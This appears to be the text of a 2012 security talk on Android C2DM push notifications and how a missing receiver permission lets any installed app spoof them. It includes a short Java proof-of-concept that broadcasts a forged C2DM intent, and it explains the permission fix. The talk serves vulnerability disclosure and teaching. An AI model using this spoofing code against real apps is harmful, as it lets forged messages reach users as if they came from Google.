Talks about Google's Cloud to Device (C2D at the time this was written in 2012 - now known as Google Cloud Messaging) technology, and ways it can be misconfigured.
2. Android C2DM Overview
• Push notification for Android
• Rides on Gtalk (XMPP)
• Messages limited to 1024 bytes
• Account limited to 200,000 messages per
day
3. A confusing process
Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
7. Parts of a Message
Required
• Registration ID – sent by client
• Collapse key – used to avoid flooding
• Auth token – header from client login auth
Optional
• Data - payload
• Delay while idle - flag
12. Example Push (seen in logcat)
I/PushService( 3990): onHandleIntent:
action=3, intent data=Bundle[{
itm=37524594341,
push_action=3,
title=message received from: jross,
collapse_key=jrossig01,
sound=m2mmsghdr.caf,
evt=M2MMSGHDR,
from=appid@gmail.com,
usr=jross
}]
13. Spoof (no cloud required)
// declare the Intent
final Intent sendC2DM = new Intent
("com.google.android.c2dm.intent.RECEIVE");
// set this as category com.app.mobile to match the intent-filter
sendC2DM.addCategory("com.app.mobile");
// add the expected data elements
sendC2DM.putExtra("itm", "37524594341");
sendC2DM.putExtra("push_action", "3");
sendC2DM.putExtra("title", "message recieved from: C2DSpoofer");
sendC2DM.putExtra("sound", "m2mmsghdr.caf");
sendC2DM.putExtra("evt", "M2MMSGHDR");
sendC2DM.putExtra("usr", send2usr);
String collapse_key = randString.genString(rng, chars, 4);
sendC2DM.putExtra("collapse_key", collapse_key);
// send the message to the on-device push notification receiver
sendBroadcast(sendC2DM);
14. What Happened?
• App received a “C2D” message from
another application installed on the
device.
• Because the permission wasn’t set
correctly, it accepted the message as
though it came from Google.
• App displayed message notification, with
the “malicious” payload intact.
15. Other Things We’ve Noticed
• Messages that come in may not be
accurately received by the activity
they are sent to (see: demo).
• If you have multiple devices, or multiple
users on a single device, things may get
tricky.
registration_id = The registration ID retrieved from the Android application on the phone. Required.
collapse_key = An arbitrary string that is used to collapse a group of like messages when the device is offline, so that only the last message gets sent to the client. This is intended to avoid sending too many messages to the phone when it comes back online. Note that since there is no guarantee of the order in which messages get sent, the "last" message may not actually be the last message sent by the application server. Required.
data.<key>= Payload data, expressed as key-value pairs. If present, it will be included in the Intent as application data, with the <key>. There is no limit on the number of key/value pairs, though there is a limit on the total size of the message. Optional.
delay_while_idle = If included, indicates that the message should not be sent immediately if the device is idle. The server will wait for the device to become active, and then only the last message for each collapse_key value will be sent. Optional.
Authorization = GoogleLogin auth=[AUTH_TOKEN]Header with a ClientLogin Auth token. The cookie must be associated with the ac2dm service. Required.
This requires the application signature be present when the permission is used
This restrict the C2D messages such that they must be sourced from Google in order for the application to process them. If the “android:permission” portion is missing, anyone can push messages of this type (Registration results) to the application.
Same as #2, but for the actual C2D messages